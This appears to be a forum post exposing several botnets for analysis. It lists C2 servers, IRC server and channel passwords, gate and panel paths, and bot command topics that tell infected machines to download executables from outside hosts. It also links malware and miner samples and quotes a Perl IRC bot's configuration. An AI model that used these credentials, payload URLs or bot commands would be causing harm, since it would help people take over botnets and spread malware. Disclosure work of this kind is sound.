Big heckers big net. Thnx to loadx and Yewnix for the ownage and exposing them. Everything is inside the config file:
/* Type of comments */
#Comment type 1 (Shell type)
// Comment type 2(C++ style)
/* Comment type 3 (C Style) */
#those lines are ignored by the ircd.
loadmodule "src/modules/commands.so";
#loadmodule "cloak.dll";
#include
92.48.86.88 (Aspergillus mod hosted in United Kingdom Maidenhead Simply Transit Ltd)
Thanx to loadx for finding this botnet.
Server: 92.48.86.88:81
PASS adobe2.tmp
NICK n[USA|XP]339728
USER 3397 "" "win" :3397
JOIN #s jobs
Now talking in #s
Topic On: [#s ] [ !dl hxxp://www.divshare.com/direct/24632542-a3c.tee ]
Topic By: [ x ]
hosting infos: http://whois.domaintools.com/92.48.86.88
dd.sult4n.net (ngrBot hosted in United States Chicago Steadfast Networks)
Thanks to anonymous guy here for finding this botnet.
Resolved : [dd.sult4n.net] To [67.202.92.70]
Resolved : [www.8rb.su] To [67.202.92.70]
Other domains: xx.sult4n.net, x.sult4n.net
Thnx to Userbased for this and for server and channel pass
Server : dd.sult4n.net:4040 PASS sulxx
Channel : #m PASS sul111
Now talking in #m
Topic On: [ #m ] [ !mod usbi
88.39mb samples
Another package with different samples for analysis purposes. Have fun. Samples
103.241.0.100 (Citadel 1.3.5.1 hosted in Net Origin Group Pty Ltd)
Found by justaguy belgian pigs farmer lol.
This is the install directory : hxxp://103.241.0.100/images/gallery/install/
This is the gate : hxxp://103.241.0.100/images/gallery/gate.php
Here the sample
Hosting infos: http://whois.domaintools.com/103.241.0.100
213.133.111.10 (Ransomware hosted in Germany Nuremberg Hetzner Online Ag)
Here u can see the page where u are asked to pay via paysafecard for your illegal activities lol : http://213.133.111.10/panel/landing/gate.php
A lot of directories are not protected so u can search for more.
For the sample here
Hosting infos: http://whois.domaintools.com/213.133.111.10
EpicBot v1.0 by h22turbo (hosted in United Kingdom Derby Webfusion Internet Solutions)
Perl bot found by Yewnix
my @adms=("Darkone");
my @canais=("#dark7887");
my @nickname = ("DARK");
my $nick = $nickname[rand scalar @nickname];
my $ircname ='dark';
chop (my $realname = `uname -a`);
$servidor='dark86.no-ip.org' unless $servidor;
my $porta='7000';
Source
EpicBot hosting infos: http://whois.domaintools.com/91.109.4.212
Autoit Bot
Found this sample and decompiled so have fun with the source which is partially encrypted.
Here the sample: hxxp://93.57.18.211/bot.exe
And here the source decompiled and partially encrypted with BitXOR
password for the link is : exposedbotnets
voscomptesenligne.eu (Andromeda Bot hosted in Netherlands International Widespread Services Limited)
Sample found by ALiSs
URLs: hxxp://voscomptesenligne.eu/joomla/image.php hxxp://www.curboc.com/joomla/image.php
Plugins: hxxp://voscomptesenligne.eu/joomla/f.pack hxxp://voscomptesenligne.eu/joomla/s.pack hxxp://voscomptesenligne.eu/joomla/r.pack hxxp://www.curboc.com /joomla/f.pack hxxp://www.curboc.com /joomla/s.pack hxxp://www.curboc.com /joomla/r.pack hxxp://voscomptesenligne.eu/joomla/fg.php?id=1880376902
Love Poem dedicated to Brian Krebs here: hxxp://voscomptesenligne.eu/
Same Poem here : hxxp://www.curboc.com
Samples: hxxp://91.223.82.147/andro.exe hxxp://www.curboc.com/andro.exe hxxp://www.curboc.com/miner.exe hxxp://voscomptesenligne.eu/miner.exe
miner.exe downloads: hxxp://93.113.171.18/upl/pYofXDkAVERHbkeo/m.jpg (www.fisier.ro)
hosting infos: http://whois.domaintools.com/91.223.82.179
178.86.23.225 (ngrBot hosted in Ukraine Odessa Tehnologii Budushego Llc)
Botnet found by rolls
Server: 178.86.23.225:1875
Server Password:
Username: uiswnri
Nickname: n{DE|XPa}uiswnri
Channel: #moon (Password: 4m3r1k)
Channeltopic: :.up hxxp://wachalol.com/images/180713.exe b2790c7513a2efbf7cb34f64c4f49ff0
Inactive domain :harlan10.com
hosting infos: http://whois.domaintools.com/178.86.23.225